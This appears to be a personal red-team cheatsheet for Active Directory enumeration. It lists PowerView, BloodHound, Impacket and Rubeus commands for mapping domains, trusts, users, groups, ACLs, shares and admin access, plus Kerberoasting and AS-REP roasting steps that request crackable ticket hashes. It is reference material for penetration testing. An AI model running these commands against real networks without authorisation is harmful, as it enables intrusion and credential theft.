Neko

Active Directory Enum

Mostly a powerview cheatsheet

Last updated: May 4th, 2023

Automated

Bloodhound

Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All -ExcludeDC

Manual

Powerview

Domain Enum

#Current Domain
Get-Domain | select Name,Parent,Forest,DomainControllers| fl
Get-DomainSID

#Domain Policy
(Get-DomainPolicyData).systemaccess

#Domain Controllers
Get-DomainController | select Name,OSversion,IPAddress | fl

Trusts

#Domain Trusts
Get-DomainTrust | select SourceName.TrustAttributes,TargetName,TrustDirection

#Forest Enum
#Current Forest
Get-Forest | select Name,SchemaRoleOwner,RootDomainSid | fl

#Forest Domains
Get-ForestDomain | select Name,PdcRoleOwner

#Forest Global Catalogue
Get-ForestGlobalCatalogue | select Name,Domain,IPAddress,OSVersion,Forest

#Forest Trusts
#Current Trusts
Get-ForestTrust

#External Forest Trusts
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

#Enum Domain External Trusts
Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

Computer Enum

#Current Domain Computers
Get-DomainComputer | select name,logoncount,description,operatingsystem

#Server
Get-DomainComputer -OperatingSystem "*Server*"

#Pingable Computers
Get-DomainComputer -Ping | select name,logoncount,description,operatingsystem

LoggedOn Users

#Current Local Logged on Users
Get-NetLoggedon | select username

#Current Computer Logged on Users
Get-NetLoggedon -ComputerName {HOST}

#Last Login for a Domian Computer
Get-LastLoggedOn -ComputerName {HOST}

User Enum

#Current Domain Users
Get-DomainUser | select name,logoncount,description,memberof,useraccountcontrol
#User Full Details
Get-DomainUser -Identify {USER} -Properties *

Group Enum

#Domain Groups
#Current Domain Groups
Get-DomainGroup | select Name

#Domain Groups Contains "Admin"
Get-DomainGroup *admin* | select name,Description

#Domain Group members
Get-DomainGroupMember -Identify "Domain Admins" | select MemberName,MemberObjectCLass,MemberSID

#Local Groups
#Local Groups for Computer
Get-NetLocalGroup -ComputerName {HOST}

#Local Group Members
Get-NetLocalGroupMember -group Administrators

#Other Computer's Group Members
Get-NetLocalGroupMember -ComputerName {HOST} -GroupName Administrators | select MemberName,IsGroup,IsDomain

Group Policy

#Domain GPOs
Get-DomainGPO | select displayname,name

#Domain GPOs for Computer
Get-DomainGPO -ComputerIdentity {HOST} | select displayname,name

#Local Group Users GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity
Get-DomainGPOUserLocalGroupMapping -Identity {USER}

#GPO applied on speecific OU
Get-DomainGPO -Identity "{}"

Organizational Units (OUs)

#Current Domain OUs
Get-DomainOU | select name,gplink

#Computers on Specific OU
(Get-DomainOU -Identity {OU}).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

Access Controls Lists (ACL)

#ACLs for Object
Get-DomainObjectAcl -SamAccountName {USER} -ResolveGUIDs

#ACLS for Prefix or Group
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=example,DC=domain,DC=com" -ResolveGUIDs | select ObjectDN,AceType,ActiveDirectoryRights

#Interesting ACLs
Find-InterestingDomainAcl -ResolveGUIDs | select IdentityReferenceName,AceType,ActiveDirectoryRights -Unique

#Path's ACL
Get-PathAcl -Path "\\{HOST}.{full.domain}\sysvol"

Other

#Share Enum
Invoke-ShareFinder
Invoke-ShareFinder -CheckShareAccess

#Sensitive Files
Invoke-FileFinder

#Domain File Servers
Get-NetFileServer

#Local Admin Access
Find-LocalAdminAccess -Verbose
Find-WMILocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess.ps1

Kerberoasting

#Find SPNs
Get-DomainUser -SPN | select samaccountname,serviceprinciplename
impacket-GetUserSPNs -request -dc-ip {IP} {full.domain}/{USER}:{PASS}
rubeus.exe kerberoast /stats

#Check for SPNs
Get-DomainUser -Identity {USER} | select serviceprinciplename

Kerberos Delegation

#Unconstrained
Get-DomainComputer -Unconstrained | select name,logoncount,msds-allowedtodelegateto | fl

#Constrained
#User Enum
Get-DomainUser -TrustedToAuth | select samaccountname,logoncount,msds-allowedtodelegateto | fl

#Computers Enum
Get-DomainComputer -TrustedToAuth | select name,logoncount,description,operatingsystem,msds-allowedtodelegateto | fl

#Resource-Based
Find-InterestingDomainACL | ?{$_.identityreferencename -match '{USER}'}

ASREPRoast

Get-DomainUser -PreauthNotRequired -Verbose
impacket-GetNPUsers -request -dc-ip {IP} {full.domain}/{USER}:{PASS}

#ASREPRoast.ps1
invoke-ASREPRoast -Verbose

More coming soon.